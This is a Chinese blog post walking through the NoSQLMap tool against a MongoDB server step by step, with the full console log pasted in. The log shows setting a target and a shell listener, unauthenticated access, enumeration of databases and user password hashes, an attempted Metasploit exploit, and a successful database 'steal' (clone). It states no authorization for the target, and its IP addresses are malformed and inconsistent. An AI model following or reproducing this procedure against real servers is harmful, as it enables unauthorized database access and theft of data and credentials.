今天使用nosqlMap对mongoDB进行攻击测试,网上虽然有很多的例子,但是都只是下载的地方,没有具体的操作日志,现在就贴上操作日志,告知一步一步怎么操作的,
1.先下载nosqlMap python开源代码吧,下载地址:-https://github.com/codingo/NoSQLMap
不过这里下载的python code版本是2.7版本的 所以得注意 若用的3.X版本的python 得修改部分的语法,比如print(),row_input得修改为input函数即可,其他缺少第三方库的就自己添加吧,若是2.X版本的python则不需要修改
2.最终的python代码结构如下:
3.启动python 使用python nosqlmap.py即可启动,Linux和windows的操作一样
4.最终 贴上启动成功 及后续的操作日志,首次使用的人就跟着一步一步的使用吧
D:\python\python.exe F:/nosqlMap/nosqlMap/NoSQLMap-master/nosqlmap.py
'clear' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
_ _ ___ ___ _ __ __
| \| |___/ __|/ _ \| | | \/ |__ _ _ __
| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \
|_|\_\___/___/\__\_\____|_| |_\__,_| .__/
v0.7 codingo@protonmail.com |_|
1-Set options
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
5-Change Platform (Current: MongoDB)
x-Exit
Select an option: 1
Options
1-Set target host/IP (Current: Not Set)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: Not Set)
8-Set shell listener port (Current: Not Set)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu
<!--1.这里是第一次操作 选择了option1 --!>
Select an option: 1
Enter the host IP/DNS name: 172.17.202.441
Target set to 172.17.202.441
Options
1-Set target host/IP (Current: 172.17.202.441)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: Not Set)
8-Set shell listener port (Current: Not Set)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu
<!--1.这里是第二次操作 选择了option1 --!>
Select an option: 7
Enter the host IP for my MongoDB/Shells: 172.17.202.4111
Shell/DB listener set to 172.17.202.4111
Options
1-Set target host/IP (Current: 172.17.202.4411)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: 172.17.202.4111)
8-Set shell listener port (Current: Not Set)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu
<!--1.这里是第三次操作 选择了option1 --!>
Select an option: 8
Enter TCP listener for shells: 80
Shell TCP listener set to 80
Options
1-Set target host/IP (Current: 172.17.202.4411)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: 172.17.202.411)
8-Set shell listener port (Current: 80)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu
<!--1.这里是第四次操作 选择了option1 --!>
Select an option: x
'clear' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
_ _ ___ ___ _ __ __
| \| |___/ __|/ _ \| | | \/ |__ _ _ __
| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \
|_|\_\___/___/\__\_\____|_| |_\__,_| .__/
v0.7 codingo@protonmail.com |_|
1-Set options
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
5-Change Platform (Current: MongoDB)
x-Exit
<!--1.这里是第五次操作 --!>
Select an option: 2
DB Access attacks (MongoDB)
=================
Checking to see if credentials are needed...
Successful access with no credentials!
MongoDB web management closed or requires authentication.
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!--1.这里是第六次操作 --!>
Select an attack: 1
Server Info:
MongoDB Version: 3.0.7
Debugs enabled : False
Platform: 64 bit
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
Select an attack: 2
List of databases:
admin
XXX
XXX
XXX
XXX
test
List of collections:
admin:
system.indexes
system.version
system.users
fs.chunks
fs.files
Database Users and Password Hashes:
Username: appAdmin
'pwdXXXXXX'
Error: Couldn't list collections. The provided credentials may not have rights.
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!--1.这里是第七次操作 --!>
Select an attack: 3
GridFS enabled on database admin
list of files:
GridFS enabled on database cornerstone
list of files:
GridFS enabled on database CPM
list of files:
GridFS enabled on database FileDB
list of files:
GridFS enabled on database local
list of files:
GridFS enabled on database test
list of files:
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!--1.这里是第八次操作 --!>
Select an attack: 5
Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined.
Press enter to continue...
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!--1.这里是第九次操作 --!>
Select an attack: 4
1-admin
2-XXX
3-XXX
4-XXX
5-XXX
6-test
Select a database to steal: 6
Does this database require credentials (y/n)? n
Something went wrong. Are you sure your MongoDB is running and options are set? Press enter to return...
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
<!--1.这里是第十次操作 --!>
Select an attack: 4
1-admin
2-XXX
3-XXX
4-XXX
5-XXX
6-test
Select a database to steal: 6
Does this database require credentials (y/n)? n
<!--最终操作成功 --!>
Database cloned. Copy another (y/n)?
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
